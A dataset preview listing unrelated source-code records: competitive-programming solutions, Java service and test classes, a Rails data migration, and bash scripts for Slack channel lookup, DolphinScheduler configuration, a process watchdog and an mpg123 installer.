text
stringlengths 1
1.05M
|
|---|
<reponame>smac89/UVA-Online-Judge-Problem-Solutions<gh_stars>1-10
#include <iostream>
#include <cstring>
#define FMAX 1e10
using namespace std;
// Solve UVA "RFP" cases: for each case pick the proposal that meets the most
// requirements (ties broken by lowest price) and print it as "RFP #k".
void solve()
{
// req: current proposal name line; name: best proposal so far; rfp: output prefix.
char req[81], name[81], rfp[] = {"RFP #"};
// n: number of requirements, p: number of proposals, rec: requirements met
// by a proposal, s: 1-based case counter (also used to detect the first case).
int n, p, rec, s = 0;
// mprc: best (lowest) price seen, mrec: best compliance ratio, prc/temp: scratch.
double mprc = FMAX, mrec = 0, prc, temp;
while(cin >> n >> p)
{
// After the first case: print a blank-line separator, or stop on n == 0.
// NOTE(review): the dangling else binds to `if (n)`, so a case with n == 0
// acts as a terminating sentinel — confirm against the problem statement,
// which may instead terminate at EOF.
if (s++)
if (n) cout << "\n\n";
else break;
cin.ignore(100, '\n');
// Skip the n requirement description lines; only the count matters here.
for (int t = 0; t < n; ++t)
cin.ignore(100, '\n');
while(p--)
{
// Proposal name is a full line; price and met-requirement count follow.
cin.getline(&req[0], 81, '\n');
cin >> prc >> rec;
// Compliance ratio: fraction of the n requirements this proposal meets.
temp = (double)rec / n;
// Better ratio wins; on a tie the cheaper proposal wins.
if (temp > mrec || (temp == mrec && prc < mprc))
{
strcpy(&name[0], &req[0]);
mrec = temp;
mprc = prc;
}
cin.ignore(100, '\n');
// Skip the rec lines listing which requirements were met.
while(rec--) cin.ignore(100, '\n');
}
// Reset the running best for the next case.
mprc = FMAX;
mrec = 0;
cout << rfp << s << '\n' << name;
}
cout << '\n';
}
// Entry point: all work (input parsing and output) happens in solve().
int main()
{
solve();
return 0;
}
|
package service;
import com.google.gson.Gson;
import play.libs.F.Promise;
import play.libs.ws.WS;
import play.libs.ws.WSResponse;
import utils.Urls;
import utils.Utils;
/*
* @Author(name="<NAME>")
*/
public class RestService {

    /** Supported HTTP verbs for {@link #callREST}. */
    public enum restServiceEnum {GET, POST, PUT, DELETE}

    /**
     * Calls the REST API at {@code Utils.getApiUrl() + requestUrl} with the
     * requested HTTP verb, optionally setting a JSON Content-Type header,
     * and blocks for up to {@code Utils.WAIT_FOR_RESPONSE} for the answer.
     *
     * @param requestUrl       path appended to the base API URL; may be null
     * @param requestJson      JSON body used for POST and PUT calls
     * @param requestJsonClass currently unused; kept for caller compatibility
     * @param contentJson      when true, sends {@code Urls.CONTENT_TYPE_JSON}
     * @param httpMetod        HTTP verb to execute
     * @return the response, or null when a required argument is null or the
     *         call fails (the original contract swallows all exceptions)
     */
    public static WSResponse callREST(String requestUrl, String requestJson, Class requestJsonClass, Boolean contentJson, restServiceEnum httpMetod){
        String url = Utils.getApiUrl();
        if (requestUrl != null) {
            url += requestUrl;
        }
        // Preserve the original contract: a missing verb or content flag yields null.
        if ((httpMetod == null) || (contentJson == null)) {
            return null;
        }
        System.out.println("In not null");
        try {
            final boolean withJsonHeader = contentJson.booleanValue();
            Promise<WSResponse> result;
            // One branch per verb; the JSON header variant is selected inline
            // instead of duplicating all four branches twice as before.
            switch (httpMetod) {
                case GET:
                    result = withJsonHeader
                            ? WS.url(url).setContentType(Urls.CONTENT_TYPE_JSON).get()
                            : WS.url(url).get();
                    break;
                case POST:
                    result = withJsonHeader
                            ? WS.url(url).setContentType(Urls.CONTENT_TYPE_JSON).post(requestJson)
                            : WS.url(url).post(requestJson);
                    break;
                case PUT:
                    result = withJsonHeader
                            ? WS.url(url).setContentType(Urls.CONTENT_TYPE_JSON).put(requestJson)
                            : WS.url(url).put(requestJson);
                    break;
                case DELETE:
                    result = withJsonHeader
                            ? WS.url(url).setContentType(Urls.CONTENT_TYPE_JSON).delete()
                            : WS.url(url).delete();
                    break;
                default:
                    return null;
            }
            return result.get(Utils.WAIT_FOR_RESPONSE);
        } catch (Exception exception) {
            // Original behavior: any failure is reported as a null response.
            return null;
        }
    }
}
|
<gh_stars>0
/*
* Copyright (c) 2015 IBM Corporation and others.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* You may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*/
package org.brunel.build.util;
import org.brunel.data.Dataset;
/**
 * Caching mechanism for {@link Dataset} instances, keyed by name.
 * Concrete implementations are registered via DataCache.useCache().
 *
 * @author drope
 */
public interface DatasetCache {

	/**
	 * Stores the given dataset under the supplied unique key.
	 *
	 * @param key     unique key
	 * @param dataset the Dataset instance to place in the cache
	 */
	void store(String key, Dataset dataset);

	/**
	 * Looks up the dataset previously stored under the given key.
	 *
	 * @param key the key
	 * @return the Dataset instance for the given key
	 */
	Dataset retrieve(String key);
}
|
// http://codeforces.com/contest/935/problem/C
#include <bits/stdc++.h>
using namespace std;
typedef complex<double> p;
// Codeforces 935C (see URL above): given a flat modelled as a disc of radius
// R centred at (x1,y1) and a point (x2,y2) to exclude, print the centre and
// radius of the largest disc inside the flat not containing that point.
int main() {
double R, x1, y1, x2, y2;
cin >> R >> x1 >> y1 >> x2 >> y2;
// Work with points as complex numbers (typedef p above) for easy vector math.
p p1 = {x1, y1};
p p2 = {x2, y2};
p p3 = p1 - p2;
// d: distance between the flat centre and the excluded point.
double d = abs(p3);
cout << fixed << setprecision(17) ;
// Point coincides with the centre: any half-radius disc tangent at the
// centre works; shift along +x by R/2.
if (p1 == p2) cout << x1 + R/2 << " " << y1 << " " << R/2 << endl;
// Point lies on or outside the flat: the whole flat is usable.
else if (d >= R) cout << x1 << " " << y1 << " " << R << endl;
else {
// Point inside: optimal disc has diameter from the point's antipodal
// boundary side, radius (d+R)/2, centre shifted away from p2 by (R-d)/2.
double r = (d + R) / 2;
p1 += p3/d * ((R - d) / 2);
cout << p1.real() << " " << p1.imag() << " " << r << endl;
}
}
|
# Minimal store menu: list the products and echo the user's selection.
print("Welcome to the store!")
print("Choose a product:")
products = ["Milk", "Bread", "Chips", "Cheese"]
# Present a 1-based menu of the available products.
for i, product in enumerate(products):
    print(str(i + 1) + ": " + product)
selection = input("Select one: ")
# Validate the selection: the original crashed on non-numeric input and
# silently accepted out-of-range or negative numbers (e.g. "-1" wrapped
# around via Python's negative indexing).
try:
    index = int(selection) - 1
except ValueError:
    print("Invalid selection: please enter a number.")
else:
    if 0 <= index < len(products):
        print(products[index])
    else:
        print("Invalid selection: choose between 1 and " + str(len(products)))
|
<reponame>NIRALUser/BatchMake
/*
* Note: This is only required if you use curl 7.8 or lower, later
* versions provide an option to curl_global_init() that does the
* win32 initialization for you.
*/
/*
* These are example functions doing socket init that Windows
* require. If you don't use windows, you can safely ignore this crap.
*/
#include <windows.h>
/* Shut down the WinSock library; pairs with the WSAStartup() performed in
 * win32_init(). Call only after a successful init. */
void win32_cleanup(void)
{
WSACleanup();
}
/*
 * Initialize WinSock version 1.1.
 * Returns 0 on success, 1 when no usable winsock.dll could be found or
 * when 1.1 is not supported (in which case WinSock is cleaned up again).
 */
int win32_init(void)
{
    WSADATA socket_data;
    WORD requested_version;

    requested_version = MAKEWORD(1, 1);
    if (WSAStartup(requested_version, &socket_data) != 0) {
        /* No usable winsock.dll was found. */
        return 1;
    }

    /*
     * WSAStartup reports 1.1 in wVersion whenever 1.1 is supported (even if
     * newer versions exist), because that is the version we requested.
     * Anything else means the DLL cannot serve us.
     */
    if (LOBYTE(socket_data.wVersion) != 1 || HIBYTE(socket_data.wVersion) != 1) {
        /* Unsupported version: undo the startup before failing. */
        WSACleanup();
        return 1;
    }

    return 0; /* 0 is ok */
}
|
<filename>src/test/java/com/keildraco/config/tests/states/ListParserTest.java
package com.keildraco.config.tests.states;
import static com.keildraco.config.testsupport.SupportClass.runParser;
import static org.junit.jupiter.api.Assertions.assertAll;
import static org.junit.jupiter.api.Assertions.assertFalse;
import static org.junit.jupiter.api.Assertions.assertNotNull;
import static org.junit.jupiter.api.Assertions.assertThrows;
import static org.junit.jupiter.api.Assertions.assertTrue;
import static org.junit.jupiter.api.Assertions.fail;
import java.io.IOException;
import java.lang.reflect.InvocationTargetException;
import java.net.URISyntaxException;
import java.util.Arrays;
import org.junit.jupiter.api.BeforeAll;
import org.junit.jupiter.api.Test;
import org.junit.jupiter.api.TestInstance;
import org.junit.jupiter.api.TestInstance.Lifecycle;
import com.keildraco.config.Config;
import com.keildraco.config.exceptions.GenericParseException;
import com.keildraco.config.exceptions.IllegalParserStateException;
import com.keildraco.config.exceptions.UnknownStateException;
import com.keildraco.config.factory.TypeFactory;
import com.keildraco.config.interfaces.ParserInternalTypeBase;
import com.keildraco.config.states.ListParser;
import static com.keildraco.config.data.Constants.ParserNames.LIST;
/**
*
* @author <NAME>
*
*/
@TestInstance(Lifecycle.PER_CLASS)
final class ListParserTest {
private static final String CAUGHT_EXCEPTION = "Caught exception running loadFile: ";
private static final String EXCEPTION_GETTING = "Exception getting type instance for {}: {}";
/**
 * Resets the global {@code Config} and registers the standard parser parts
 * once before any test in this class runs.
 *
 * @throws NoSuchMethodException
 * @throws InstantiationException
 * @throws IllegalAccessException
 * @throws InvocationTargetException
 */
@BeforeAll
void setUp() throws NoSuchMethodException, InstantiationException, IllegalAccessException,
InvocationTargetException {
Config.reset();
Config.registerKnownParts();
}
/**
 * Parses a well-formed list and checks membership: "alpha" must be present,
 * "bravo" must not. Any exception fails the test with full logging.
 */
@Test
void testGetState() {
try {
final ParserInternalTypeBase pb = runParser("[ alpha, beta, charlie(! delta) ]", LIST);
assertAll("result is correct", () -> assertNotNull(pb, "result not null"),
() -> assertTrue(pb.has("alpha"), "has member named alpha"),
() -> assertFalse(pb.has("bravo"), "has no member named bravo"));
} catch (final IOException | IllegalArgumentException | IllegalParserStateException
| UnknownStateException | GenericParseException | NoSuchMethodException
| InstantiationException | IllegalAccessException | InvocationTargetException
| URISyntaxException e) {
Config.LOGGER.error(EXCEPTION_GETTING, e.toString(), e.getMessage());
Arrays.stream(e.getStackTrace()).forEach(Config.LOGGER::error);
fail(CAUGHT_EXCEPTION + e);
}
}
/**
 * Verifies that a {@link ListParser} can be instantiated directly from a
 * fresh {@link TypeFactory}.
 */
@Test
void testListParser() {
try {
final TypeFactory tf = new TypeFactory();
final ListParser op = new ListParser(tf, null);
assertNotNull(op, "Able to instantiate a ListParser");
} catch (final Exception e) {
Config.LOGGER.error(EXCEPTION_GETTING, e.toString(), e.getMessage());
Arrays.stream(e.getStackTrace()).forEach(Config.LOGGER::error);
fail(CAUGHT_EXCEPTION + e);
}
}
/**
 * Verifies that registering the parser's state transitions completes
 * without throwing.
 */
@Test
void testRegisterTransitions() {
try {
final TypeFactory tf = new TypeFactory();
final ListParser op = new ListParser(tf, null);
op.registerTransitions(tf);
assertTrue(true, "was able to register transitions");
} catch (final Exception e) {
Config.LOGGER.error(EXCEPTION_GETTING, e.toString(), e.getMessage());
Arrays.stream(e.getStackTrace()).forEach(Config.LOGGER::error);
fail(CAUGHT_EXCEPTION + e);
}
}
/**
 * Empty input must raise {@link IllegalParserStateException}.
 */
@Test
void testErrorNoData() {
assertThrows(IllegalParserStateException.class, () -> runParser("", LIST));
}
/**
 * Malformed list content must raise {@link GenericParseException}.
 */
@Test
void testErrorBadData() {
assertThrows(GenericParseException.class, () -> runParser("[ a, ( ]", LIST));
}
/**
 * A list missing its closing bracket (early EOF) must raise
 * {@link GenericParseException}.
 */
@Test
void testErrorEarlyEOF() {
assertThrows(GenericParseException.class, () -> runParser("[ ash, blood, choices", LIST));
}
}
|
<Window x:Class="Window1"
xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
Title="Window1" Height="150" Width="200">
<!-- Single-cell grid (no rows/columns defined), so both children occupy
     the same implicit cell and the Button is drawn over the TextBox. -->
<Grid>
<TextBox Name="textBox1"></TextBox>
<!-- Click handler Button_Click is defined in the Window1 code-behind. -->
<Button Name="button1" Click="Button_Click">Button</Button>
</Grid>
</Window>
|
<gh_stars>1-10
package com.assist.watchnext.model.tmdb;
import java.util.List;
/**
 * Plain data holder for a TMDB (The Movie Database) movie payload.
 * Field names deliberately use snake_case to mirror the JSON attribute
 * names of the TMDB REST API (for direct JSON binding).
 */
public class TmdbMovie {
private String poster_path;
private List<TmdbGenre> genres;
private String homepage;
private String imdb_id;
private String original_title;
private String overview;
private String release_date;
private float vote_average;
private TmdbTrailerList videos;
private String original_language;
public String getOriginal_language() {
return original_language;
}
public void setOriginal_language(String original_language) {
this.original_language = original_language;
}
/** No-arg constructor (leaves all fields at their defaults). */
public TmdbMovie() {}
/** Convenience constructor initializing every field at once. */
public TmdbMovie(String poster_path, List<TmdbGenre> genres, String homepage, String imdb_id, String original_title, String overview, String release_date, float vote_average, TmdbTrailerList videos, String original_language) {
this.poster_path = poster_path;
this.genres = genres;
this.homepage = homepage;
this.imdb_id = imdb_id;
this.original_title = original_title;
this.overview = overview;
this.release_date = release_date;
this.vote_average = vote_average;
this.videos = videos;
this.original_language = original_language;
}
public String getPoster_path() {
return poster_path;
}
public void setPoster_path(String poster_path) {
this.poster_path = poster_path;
}
public List<TmdbGenre> getGenres() {
return genres;
}
public void setGenres(List<TmdbGenre> genres) {
this.genres = genres;
}
public String getHomepage() {
return homepage;
}
public void setHomepage(String homepage) {
this.homepage = homepage;
}
public String getImdb_id() {
return imdb_id;
}
public void setImdb_id(String imdb_id) {
this.imdb_id = imdb_id;
}
public String getOriginal_title() {
return original_title;
}
public void setOriginal_title(String original_title) {
this.original_title = original_title;
}
public String getOverview() {
return overview;
}
public void setOverview(String overview) {
this.overview = overview;
}
public String getRelease_date() {
return release_date;
}
public void setRelease_date(String release_date) {
this.release_date = release_date;
}
public float getVote_average() {
return vote_average;
}
public void setVote_average(float vote_average) {
this.vote_average = vote_average;
}
public TmdbTrailerList getVideos() {
return videos;
}
/** Debug representation listing every field. */
@Override
public String toString() {
return "TmdbMovie{" +
"poster_path='" + poster_path + '\'' +
", genres=" + genres +
", homepage='" + homepage + '\'' +
", imdb_id='" + imdb_id + '\'' +
", original_title='" + original_title + '\'' +
", overview='" + overview + '\'' +
", release_date='" + release_date + '\'' +
", vote_average=" + vote_average +
", videos=" + videos +
", original_language='" + original_language + '\'' +
'}';
}
// Note: setter kept below toString() to match the original layout.
public void setVideos(TmdbTrailerList videos) {
this.videos = videos;
}
}
|
/**
 * Generic constructor signature: any newable whose instances are of type T.
 * `any[]` for the argument list is required for mixin-style constraints,
 * hence the targeted eslint suppression.
 */
export type Constructor<T = unknown> = new (
// eslint-disable-next-line @typescript-eslint/no-explicit-any
...args: any[]
) => T
|
from typing import List, Tuple
class SeamProcessor:
    """Seam-carving helper that operates on a 2-D grid of pixel values."""

    def __init__(self, image: List[List[int]]):
        # The grid is held by reference and mutated in place by remove_seam().
        self.image = image

    def calculate_energy(self) -> List[List[int]]:
        """Return an energy map with the same dimensions as the image.

        NOTE(review): the energy computation itself is a placeholder; every
        cell is currently zero, matching the original stub.
        """
        height = len(self.image)
        width = len(self.image[0])
        return [[0] * width for _ in range(height)]

    def find_seam(self) -> List[Tuple[int, int]]:
        """Return the (row, col) coordinates of the lowest-energy seam.

        NOTE(review): seam search is a placeholder; an empty seam is
        returned, matching the original stub.
        """
        empty_seam: List[Tuple[int, int]] = []
        return empty_seam

    def remove_seam(self, seam: List[Tuple[int, int]]) -> None:
        """Delete one pixel per (row, col) coordinate from the image in place."""
        for row_index, col_index in seam:
            del self.image[row_index][col_index]
|
<gh_stars>0
# Copies each Run's legacy video_url column into a dedicated Video row,
# and restores the column from those rows on rollback.
class MigrateRunVideoUrlsToVideos < ActiveRecord::Migration[6.0]
# video_url is included in ignored_columns in Run, so we can't use standard ActiveRecord stuff to create Videos or rollback the migration
def up
# Only non-null, non-empty URLs are migrated; timestamps are set to now().
sql = "INSERT INTO videos (run_id, url, created_at, updated_at)
SELECT id, video_url, now(), now()
FROM runs
WHERE
video_url IS NOT NULL
AND video_url <> ''
".squish
ActiveRecord::Base.connection.exec_insert(sql)
end
def down
# Rollback: write each video's URL back onto its run (UPDATE ... FROM is
# PostgreSQL syntax). Inserted Video rows are intentionally left in place.
sql = "UPDATE runs
SET video_url = videos.url
FROM videos
WHERE videos.run_id = runs.id
".squish
ActiveRecord::Base.connection.exec_update(sql)
end
end
|
<reponame>basicarrero/pyplsqlparser<gh_stars>1-10
class CaseChangingStream():
    """Wrap an ANTLR-style character stream, forcing look-ahead characters
    and extracted text to a single case while delegating everything else to
    the wrapped stream."""

    def __init__(self, stream, upper):
        self._stream = stream
        self._upper = upper

    def __getattr__(self, name):
        # Any attribute not defined here is served by the wrapped stream.
        return self._stream.__getattribute__(name)

    def LA(self, offset):
        code = self._stream.LA(offset)
        # EOF / sentinel values (<= 0) pass through untouched.
        if code <= 0:
            return code
        ch = chr(code)
        return ord(ch.upper()) if self._upper else ord(ch.lower())

    def getText(self, start, stop):
        raw = self._stream.getText(start, stop)
        return raw.upper() if self._upper else raw.lower()
|
// Auto-generated migration-report payload: registers the "Embedded framework -
// Spring Boot" issue (with the jar files it was detected in) under its
// problem-summary ID, then notifies the report UI that loading finished.
MIGRATION_ISSUES_DETAILS["0785d94d-b39c-4d3f-9127-df45b30e6cda"] = [
{description: "<p>The application embeds the Spring Boot framework.<\/p>", ruleID: "3rd-party-03000", issueName: "Embedded framework - Spring Boot",
problemSummaryID: "0785d94d-b39c-4d3f-9127-df45b30e6cda", files: [
{l:"spring-petclinic-rest-2.4.2.jar/BOOT-INF/lib/spring-boot-actuator-2.4.2.jar", oc:"1"},
{l:"spring-petclinic-rest-2.4.2.jar/BOOT-INF/lib/spring-boot-actuator-autoconfigure-2.4.2.jar", oc:"1"},
{l:"spring-petclinic-rest-2.4.2.jar/BOOT-INF/lib/spring-boot-2.4.2.jar", oc:"1"},
{l:"spring-petclinic-rest-2.4.2.jar/BOOT-INF/lib/spring-boot-jarmode-layertools-2.4.2.jar", oc:"1"},
{l:"spring-petclinic-rest-2.4.2.jar/BOOT-INF/lib/spring-boot-autoconfigure-2.4.2.jar", oc:"1"},
], resourceLinks: [
]},
];
onProblemSummaryLoaded("0785d94d-b39c-4d3f-9127-df45b30e6cda");
|
#!/bin/bash
set -e
. ./lib/env.sh
ts=`date '+%s'`
# Look up the Slack channel ID for a channel name (defaults to $slack_channel).
# The full channel list is cached to disk, so once a day is enough.
# tested
get_channels_id() {
channel_name=$slack_channel
if [ $# -eq 1 ]; then
channel_name=$1
fi
channels_list_file="tmp/channels_list.json"
channels_list_ts=0
if [ -e $channels_list_file ]; then
channels_list_ts=`date '+%s' -r $channels_list_file`
fi
# Has more than one day passed since the cache file's timestamp?
channels_list_diff=$((ts - channels_list_ts))
if [ $channels_list_diff -gt 86400 ]; then
# Fetch the full list of channels
channels_list=`wget -q -O - --post-data "token=${slack_token}&exclude_archived=true" https://slack.com/api/channels.list`
# Cache the response to a file
echo $channels_list > $channels_list_file
else
# Restore from the cache
channels_list=`cat $channels_list_file`
fi
# Filter channels_list by the channel name to obtain channels_id
channels_id=`echo $channels_list | jq '.channels[] | select(.name == "'${channel_name}'")' | jq .id`
# Strip the surrounding double quotes from the jq output
channels_id=${channels_id:1:-1}
echo $channels_id
return 0
}
# Fetch the member IDs of a channel.
# The result is cached to disk, so once every ten minutes is enough.
# tested
get_members_list() {
channels_id=$1
members_list_file="tmp/members_list.json"
members_list_ts=0
if [ -e $members_list_file ]; then
members_list_ts=`date '+%s' -r $members_list_file`
fi
# Have more than ten minutes passed since the cache file's timestamp?
members_list_diff=$((ts - members_list_ts))
if [ $members_list_diff -gt 600 ]; then
# Fetch detailed info for the channel identified by channels_id
channels_info=`wget -q -O - --post-data "token=${slack_token}&channel=${channels_id}" https://slack.com/api/channels.info`
# Extract the member list from channels_info
members_list=`echo $channels_info | jq .channel.members[]`
# Cache the result to a file
echo $members_list > $members_list_file
else
# Restore from the cache
members_list=`cat $members_list_file`
fi
echo $members_list
return 0
}
# Open (or fetch) a direct-message channel with the given member and echo its
# ID. The raw API response is written to tmp/im_open.json for debugging.
open_im() {
member_id=$1
im_open=`wget -q -O - --post-data "token=${slack_token}&user=${member_id}" https://slack.com/api/im.open`
echo $im_open > ./tmp/im_open.json
im_id=`echo $im_open | jq .channel.id`
# Strip the surrounding double quotes from the jq output
im_id=${im_id:1:-1}
echo $im_id
}
|
#!/bin/bash
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
set -e
echo "init env variables"
# Define parameters default value.
#============================================================================
# Database Source
#============================================================================
export DATABASE_HOST=${DATABASE_HOST:-"127.0.0.1"}
export DATABASE_PORT=${DATABASE_PORT:-"5432"}
export DATABASE_USERNAME=${DATABASE_USERNAME:-"root"}
export DATABASE_PASSWORD=${DATABASE_PASSWORD:-"root"}
export DATABASE_DATABASE=${DATABASE_DATABASE:-"dolphinscheduler"}
export DATABASE_TYPE=${DATABASE_TYPE:-"postgresql"}
export DATABASE_DRIVER=${DATABASE_DRIVER:-"org.postgresql.Driver"}
export DATABASE_PARAMS=${DATABASE_PARAMS:-"characterEncoding=utf8"}
#============================================================================
# System
#============================================================================
export DOLPHINSCHEDULER_ENV_PATH=${DOLPHINSCHEDULER_ENV_PATH:-"/opt/dolphinscheduler/conf/env/dolphinscheduler_env.sh"}
export DOLPHINSCHEDULER_DATA_BASEDIR_PATH=${DOLPHINSCHEDULER_DATA_BASEDIR_PATH:-"/tmp/dolphinscheduler"}
export DOLPHINSCHEDULER_OPTS=${DOLPHINSCHEDULER_OPTS:-""}
export RESOURCE_STORAGE_TYPE=${RESOURCE_STORAGE_TYPE:-"NONE"}
export RESOURCE_UPLOAD_PATH=${RESOURCE_UPLOAD_PATH:-"/ds"}
export FS_DEFAULT_FS=${FS_DEFAULT_FS:-"s3a://xxxx"}
export FS_S3A_ENDPOINT=${FS_S3A_ENDPOINT:-"s3.xxx.amazonaws.com"}
export FS_S3A_ACCESS_KEY=${FS_S3A_ACCESS_KEY:-"xxxxxxx"}
export FS_S3A_SECRET_KEY=${FS_S3A_SECRET_KEY:-"xxxxxxx"}
#============================================================================
# Zookeeper
#============================================================================
export ZOOKEEPER_QUORUM=${ZOOKEEPER_QUORUM:-"127.0.0.1:2181"}
export ZOOKEEPER_ROOT=${ZOOKEEPER_ROOT:-"/dolphinscheduler"}
#============================================================================
# Master Server
#============================================================================
export MASTER_EXEC_THREADS=${MASTER_EXEC_THREADS:-"100"}
export MASTER_EXEC_TASK_NUM=${MASTER_EXEC_TASK_NUM:-"20"}
export MASTER_HEARTBEAT_INTERVAL=${MASTER_HEARTBEAT_INTERVAL:-"10"}
export MASTER_TASK_COMMIT_RETRYTIMES=${MASTER_TASK_COMMIT_RETRYTIMES:-"5"}
export MASTER_TASK_COMMIT_INTERVAL=${MASTER_TASK_COMMIT_INTERVAL:-"1000"}
export MASTER_MAX_CPULOAD_AVG=${MASTER_MAX_CPULOAD_AVG:-"100"}
export MASTER_RESERVED_MEMORY=${MASTER_RESERVED_MEMORY:-"0.1"}
export MASTER_LISTEN_PORT=${MASTER_LISTEN_PORT:-"5678"}
#============================================================================
# Worker Server
#============================================================================
export WORKER_EXEC_THREADS=${WORKER_EXEC_THREADS:-"100"}
export WORKER_HEARTBEAT_INTERVAL=${WORKER_HEARTBEAT_INTERVAL:-"10"}
export WORKER_FETCH_TASK_NUM=${WORKER_FETCH_TASK_NUM:-"3"}
export WORKER_MAX_CPULOAD_AVG=${WORKER_MAX_CPULOAD_AVG:-"100"}
export WORKER_RESERVED_MEMORY=${WORKER_RESERVED_MEMORY:-"0.1"}
export WORKER_LISTEN_PORT=${WORKER_LISTEN_PORT:-"1234"}
export WORKER_GROUP=${WORKER_GROUP:-"default"}
export WORKER_WEIGHT=${WORKER_WEIGHT:-"100"}
#============================================================================
# Alert Server
#============================================================================
# alert plugin dir
export ALERT_PLUGIN_DIR=${ALERT_PLUGIN_DIR:-"/opt/dolphinscheduler"}
# XLS FILE
export XLS_FILE_PATH=${XLS_FILE_PATH:-"/tmp/xls"}
# mail
export MAIL_SERVER_HOST=${MAIL_SERVER_HOST:-""}
export MAIL_SERVER_PORT=${MAIL_SERVER_PORT:-""}
export MAIL_SENDER=${MAIL_SENDER:-""}
export MAIL_USER=${MAIL_USER:-""}
export MAIL_PASSWD=${MAIL_PASSWD:-""}
export MAIL_SMTP_STARTTLS_ENABLE=${MAIL_SMTP_STARTTLS_ENABLE:-"true"}
export MAIL_SMTP_SSL_ENABLE=${MAIL_SMTP_SSL_ENABLE:-"false"}
export MAIL_SMTP_SSL_TRUST=${MAIL_SMTP_SSL_TRUST:-""}
# wechat
export ENTERPRISE_WECHAT_ENABLE=${ENTERPRISE_WECHAT_ENABLE:-"false"}
export ENTERPRISE_WECHAT_CORP_ID=${ENTERPRISE_WECHAT_CORP_ID:-""}
export ENTERPRISE_WECHAT_SECRET=${ENTERPRISE_WECHAT_SECRET:-""}
export ENTERPRISE_WECHAT_AGENT_ID=${ENTERPRISE_WECHAT_AGENT_ID:-""}
export ENTERPRISE_WECHAT_USERS=${ENTERPRISE_WECHAT_USERS:-""}
#============================================================================
# Frontend
#============================================================================
export FRONTEND_API_SERVER_HOST=${FRONTEND_API_SERVER_HOST:-"127.0.0.1"}
export FRONTEND_API_SERVER_PORT=${FRONTEND_API_SERVER_PORT:-"12345"}
echo "generate app config"
# Render every *.tpl template under conf/: the eval'd here-document expands
# the environment variables exported above into the template text, and the
# result is written next to the template with the .tpl suffix stripped.
ls ${DOLPHINSCHEDULER_HOME}/conf/ | grep ".tpl" | while read line; do
eval "cat << EOF
$(cat ${DOLPHINSCHEDULER_HOME}/conf/${line})
EOF
" > ${DOLPHINSCHEDULER_HOME}/conf/${line%.*}
done
echo "generate nginx config"
# Substitute the frontend API host/port placeholders into the nginx site config.
sed -i "s/FRONTEND_API_SERVER_HOST/${FRONTEND_API_SERVER_HOST}/g" /etc/nginx/conf.d/dolphinscheduler.conf
sed -i "s/FRONTEND_API_SERVER_PORT/${FRONTEND_API_SERVER_PORT}/g" /etc/nginx/conf.d/dolphinscheduler.conf
|
#include <iostream>
#include <random>
//Function to simulate a dice roll
int roll_dice()
{
std:: random_device rd;
std::mt19937 gen(rd());
std::uniform_int_distribution<> dist(1, 6);
return dist(gen);
}
int main() {
int result = roll_dice();
std::cout << result << std::endl;
}
|
#!/bin/bash
# Watchdog: (re)start dispatcher.sh when the PID recorded in dispatcher.pid
# is no longer running.
#
# Fixes over the original:
#  - a missing/empty pid file no longer makes `cat` fail or `ps -p` error out;
#    it is treated the same as a dead dispatcher.
#  - variables are quoted so paths containing spaces do not break the script.
SCRIPT=$(readlink -f "$0")
ROOTDIR=$(dirname "$SCRIPT")
PID_FILE="$ROOTDIR/dispatcher.pid"

dispatcherPID=""
if [ -f "$PID_FILE" ]; then
    dispatcherPID=$(cat "$PID_FILE")
fi

if [ -n "$dispatcherPID" ] && ps -p "$dispatcherPID" > /dev/null; then
    #echo -e "Dispatcher Run"
    exit
else
    #echo -e "Started dispatcher"
    nohup "$ROOTDIR/dispatcher.sh" &
    #cho -e "Dispatcher status : \e[31mStopped\e[0m"
fi
|
#!/usr/bin/env bash
# Copyright 2015 Johns Hopkins University (author: Jan Trmal)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# THIS CODE IS PROVIDED *AS IS* BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, EITHER EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION ANY IMPLIED
# WARRANTIES OR CONDITIONS OF TITLE, FITNESS FOR A PARTICULAR PURPOSE,
# MERCHANTABLITY OR NON-INFRINGEMENT.
# See the Apache 2 License for the specific language governing permissions and
# limitations under the License.
#
# This script attempts to install mpg123, which can be used for decoding
# mp2 and mp3 file formats.
VERSION=1.21.0
# Allow the caller to override the wget binary via $WGET.
WGET=${WGET:-wget}
# errcho: echo to stderr so progress/errors don't pollute captured stdout.
errcho() { echo "$@" 1>&2; }
errcho "****() Installing MPG123"
# Obtain the source tarball: reuse a local copy from $DOWNLOAD_DIR when
# available, otherwise download it from SourceForge.
if [ ! -e mpg123-$VERSION.tar.bz2 ]; then
errcho "Could not find the tarball mpg123-$VERSION.tar.bz2"
if [ -d "$DOWNLOAD_DIR" ]; then
cp -p "$DOWNLOAD_DIR/mpg123-$VERSION.tar.bz2" .
else
if ! $WGET --version >&/dev/null; then
errcho "This script requires you to first install wget"
errcho "You can also just download mpg123-$VERSION.tar.bz2 from"
errcho "https://www.mpg123.org/download.shtml"
errcho "and run this installation script again"
exit 1
fi
$WGET -T 10 -t 3 -c "https://downloads.sourceforge.net/project/mpg123/mpg123/$VERSION/mpg123-$VERSION.tar.bz2"
fi
if [ ! -e mpg123-$VERSION.tar.bz2 ]; then
errcho "Download of mpg123-$VERSION.tar.bz2 failed!"
errcho "You can also just download mpg123-$VERSION.tar.bz2 from"
errcho "https://www.mpg123.org/download.shtml"
errcho "and run this installation script again"
exit 1
fi
fi
